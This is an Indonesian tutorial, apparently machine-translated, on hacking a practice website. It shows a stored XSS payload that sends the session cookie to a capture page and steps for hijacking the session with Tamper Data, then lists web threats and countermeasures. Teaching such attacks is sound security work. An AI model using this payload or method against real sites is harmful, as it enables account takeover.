Bagaimana Cara Meretas Situs Web? Teknik Peretasan Situs Umum

Teknik Peretasan Situs Web

Lebih banyak orang memiliki akses ke internet dibandingkan sebelumnya. Hal ini mendorong banyak organisasi untuk mengembangkan aplikasi berbasis web yang dapat digunakan pengguna secara online untuk berinteraksi dengan organisasi. Kode aplikasi web yang ditulis dengan buruk dapat dieksploitasi untuk mendapatkan akses tidak sah ke data sensitif dan server web.

Dalam tutorial ini Anda akan mempelajari cara meretas situs web, dan kami akan memperkenalkannya kepada Anda teknik peretasan aplikasi web dan tindakan balasannya Anda dapat menempatkannya di tempat untuk melindungi diri dari serangan semacam itu.

Cara Meretas Situs Web

Dalam skenario praktis peretasan situs web ini, kita akan membajak sesi pengguna aplikasi web yang berlokasi di www.techpanda.org. Kami akan menggunakan skrip lintas situs untuk membaca id sesi cookie kemudian menggunakannya untuk meniru sesi pengguna yang sah.

Asumsi yang dibuat adalah penyerang mempunyai akses ke aplikasi web dan dia ingin membajak sesi pengguna lain yang menggunakan aplikasi yang sama. Tujuan dari serangan ini adalah untuk mendapatkan akses admin ke aplikasi web dengan asumsi akun akses penyerang terbatas.

Langkah 1) Buka URL http://www.techpanda.org/.

Untuk keperluan praktik, sangat disarankan untuk mendapatkan akses menggunakan SQL Injection. Lihat ini artikel untuk informasi lebih lanjut tentang cara melakukannya.

Langkah 2) Masukkan Rincian Login.

Email loginnya adalah admin@google.com, kata sandinya adalah Kata Sandi2010.

Langkah 3) Periksa dasbor.

Jika Anda berhasil login, maka Anda akan mendapatkan dashboard berikut

Meretas Situs Web

Langkah 4) Masukkan Konten Baru.

Klik Tambahkan Kontak Baru dan Masukkan yang berikut sebagai nama depan

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

Langkah 5) Add Javascript.

Kode di atas menggunakan JavaNaskah. Itu menambahkan hyperlink dengan acara onclick. Saat pengguna yang tidak menaruh curiga mengeklik tautan tersebut, peristiwa tersebut akan mengambil kembali tautan tersebut PHP ID sesi cookie dan mengirimkannya ke snatch_sess_id.php halaman bersama dengan id sesi di URL

Meretas Situs Web

Langkah 6) Tambahkan Rincian.

Masukkan rincian yang tersisa seperti yang ditunjukkan di bawah ini dan Klik Simpan Perubahan

Meretas Situs Web

Langkah 7) Periksa dasbor.

Dasbor Anda sekarang akan terlihat seperti layar berikut

Meretas Situs Web

Langkah 8) Periksa id sesi.

  • Karena kode skrip lintas situs disimpan dalam database, maka akan dimuat setiap kali pengguna dengan hak akses login
  • Misalkan administrator login dan mengklik hyperlink yang bertuliskan Gelap
  • Dia akan mendapatkan jendela dengan ID sesi yang ditampilkan di URL
  • Meretas Situs Web

    Note: skrip mungkin mengirimkan nilai ke beberapa server jauh tempat PHPSESSID disimpan kemudian pengguna diarahkan kembali ke situs web seolah-olah tidak terjadi apa-apa.

    Note: nilai yang Anda dapatkan mungkin berbeda dengan yang ada di halaman web ini tutorial peretasan, tapi konsepnya sama

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    Diagram alur di bawah ini menunjukkan langkah-langkah yang harus Anda ambil untuk menyelesaikan latihan ini.

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    • Anda akan perlu Firefox browser web untuk bagian ini dan add-on Tamper Data
    • Open Firefox dan instal add seperti yang ditunjukkan pada diagram di bawah ini

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    • Cari data tamper lalu klik install seperti gambar di atas

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    • Klik Terima dan Instal…

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    • Klik Restart sekarang ketika instalasi selesai
    • Aktifkan bilah menu di Firefox jika tidak ditampilkan

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    • Klik pada menu tools lalu pilih Tamper Data seperti gambar di bawah ini

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    • Anda akan mendapatkan Jendela berikut. Catatan: Jika Windows tidak kosong, tekan tombol hapus

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    • Klik pada menu Mulai Tamper
    • Beralih kembali ke Firefox peramban web, ketik http://www.techpanda.org/dashboard.php lalu tekan tombol enter untuk memuat halaman
    • Anda akan mendapatkan pop up berikut dari Tamper Data

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    • Jendela pop-up memiliki tiga (3) opsi. Opsi Tamper memungkinkan Anda mengubah informasi header HTTP sebelum dikirimkan ke server.
    • Klik di atasnya
    • Anda akan mendapatkan jendela berikut

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    • Salin ID sesi PHP Anda menyalin dari URL serangan dan menempelkannya setelah tanda sama dengan. Nilai Anda sekarang akan terlihat seperti ini
    PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
    • Klik tombol OK
    • Anda akan mendapatkan jendela popup data Tamper lagi

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    • Hapus tanda centang pada kotak yang menanyakan Lanjutkan Perusakan?
    • Klik tombol kirim setelah selesai
    • Anda seharusnya dapat melihat dashboard seperti yang ditunjukkan di bawah ini

    Sesi Peniruan Identitas menggunakan Firefox dan tambahan Tamper Data

    Note: kami tidak login, kami meniru sesi login menggunakan nilai PHPSESSID yang kami ambil menggunakan skrip lintas situs

    Apa itu Aplikasi Web? Apa itu Ancaman Web?

    Aplikasi web (alias situs web) adalah aplikasi yang didasarkan pada model klien-server. Itu Server menyediakan akses database dan logika bisnis. Itu dihosting di server web. Aplikasi klien berjalan di browser web klien. Aplikasi web biasanya ditulis dalam bahasa seperti Java, C#, dan VB.Net, PHP, ColdFusion Markup Language, dll. mesin database yang digunakan dalam aplikasi web meliputi MySQL, MSSQL Server, PostgreSQL, SQLite, Dll

    Teknik Peretasan Situs Web Teratas

    Sebagian besar aplikasi web dihosting di server publik yang dapat diakses melalui Internet. Hal ini membuat aplikasi tersebut rentan terhadap serangan karena aksesnya yang mudah. ​​Berikut ini adalah beberapa ancaman umum pada aplikasi web.

    • SQL Injection – tujuan dari ancaman ini bisa jadi untuk menerobos algoritma login, menyabotase data, dan lain sebagainya.
    • Penolakan serangan layanan– tujuan dari ancaman ini adalah untuk menolak akses pengguna yang sah terhadap sumber daya
    • XSS Skrip Lintas Situs– Tujuan dari ancaman ini mungkin untuk memasukkan kode yang dapat dieksekusi pada browser sisi klien.
    • Keracunan Cookie/Sesi– tujuan ancaman ini adalah untuk mengubah cookie/data sesi oleh penyerang untuk mendapatkan akses tidak sah.
    • Perusakan Formulir – tujuan dari ancaman ini adalah untuk mengubah bentuk data seperti harga di aplikasi e-commerce sehingga penyerang bisa mendapatkan barang dengan harga lebih murah.
    • Injeksi Kode – tujuan dari ancaman ini adalah untuk memasukkan kode seperti PHP, Python, dll. yang dapat dieksekusi di server. Kode tersebut dapat menginstal pintu belakang, mengungkapkan informasi sensitif, dll.
    • Perusakan– tujuan dari ancaman ini adalah untuk mengubah halaman yang ditampilkan pada situs web dan mengalihkan semua permintaan halaman ke satu halaman yang berisi pesan penyerang.

    Bagaimana Melindungi Situs Web Anda dari Peretasan?

    Suatu organisasi dapat mengadopsi kebijakan berikut untuk melindungi dirinya dari serangan server web.

    • SQL Injection – membersihkan dan memvalidasi parameter pengguna sebelum mengirimkannya ke database untuk diproses dapat membantu mengurangi kemungkinan diserang melalui SQL Injection. Mesin basis data seperti MS SQL Server, MySQL, dll. parameter dukungan, dan pernyataan yang disiapkan. Pernyataan ini jauh lebih aman dibandingkan pernyataan SQL tradisional
    • Penolakan serangan layanan - firewall dapat digunakan untuk menghentikan lalu lintas dari alamat IP yang mencurigakan jika serangannya berupa DoS sederhana. Konfigurasi jaringan dan Sistem Deteksi Intrusi yang tepat juga dapat membantu mengurangi kemungkinan a serangan DoS telah sukses.
    • Skrip Lintas Situs – memvalidasi dan membersihkan header, parameter yang diteruskan melalui URL, parameter formulir, dan nilai tersembunyi dapat membantu mengurangi serangan XSS.
    • Keracunan Cookie/Sesi – hal ini dapat dicegah dengan mengenkripsi konten cookie, mengatur waktu cookie setelah beberapa waktu, mengaitkan cookie dengan alamat IP klien yang digunakan untuk membuatnya.
    • Bentuk temper – hal ini dapat dicegah dengan memvalidasi dan memverifikasi input pengguna sebelum memprosesnya.
    • Injeksi Kode – hal ini dapat dicegah dengan memperlakukan semua parameter sebagai data, bukan kode yang dapat dieksekusi. Sanitasi dan Validasi dapat digunakan untuk menerapkan hal ini.
    • Perusakan – kebijakan keamanan pengembangan aplikasi web yang baik harus memastikan bahwa kebijakan tersebut menyegel kerentanan yang umum digunakan untuk mengakses server webIni dapat berupa konfigurasi yang tepat dari sistem operasi, perangkat lunak server web, dan praktik keamanan terbaik saat mengembangkan aplikasi web.
    Periksa ini: 9 Pemindai URL Terbaik untuk Memeriksa Tautan Aman dari Malware

    Kesimpulan

    • Aplikasi web didasarkan pada model server-klien. Sisi klien menggunakan browser web untuk mengakses sumber daya di server.
    • Aplikasi web biasanya dapat diakses melalui internet. Hal ini membuat mereka rentan terhadap serangan.
    • Ancaman aplikasi web termasuk Injeksi SQL, Injeksi Kode, XSS, Defacement, keracunan Cookie, dll.
    • Kebijakan keamanan yang baik ketika mengembangkan aplikasi web dapat membantu mengamankannya.